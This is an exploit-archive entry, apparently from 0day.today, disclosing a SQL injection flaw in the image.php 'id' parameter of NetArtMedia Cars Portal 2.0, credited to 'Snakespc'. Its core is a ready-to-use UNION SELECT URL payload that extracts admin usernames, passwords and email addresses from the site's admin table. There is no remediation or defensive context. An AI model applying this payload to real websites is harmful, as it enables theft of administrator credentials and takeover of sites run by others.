NetArtMedia Cars Portal 2.0 (image.php id) SQL Injection Vulnerability

2008-11-23T00:00:00
ID 1337DAY-ID-4231
Type zdt
Reporter Snakespc
Modified 2008-11-23T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================================
NetArtMedia Cars Portal 2.0 (image.php id) SQL Injection Vulnerability
======================================================================


==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =                Discovered By: Snakespc  :::ALGERIAN HaCkEr:::         =     =   
                =                                                                                    =
                =                                                                                    =
                =           Sript : http://www.netartmedia.net/carsportal/                           =
                =                               www.netartmedia.net                                  =              
                 =================================== Snakespc ======================================    


[*]Exploit:
Using FireFox
view-source:http://localhost/[script_path]/image.php?id=-1 UNION SELECT 1,2,concat_ws(0x3e,username,password,email),4,5,6 FROM websiteadmin_admin_users--
                                                                   
===================================================================================================================



#  0day.today [2018-04-12]  #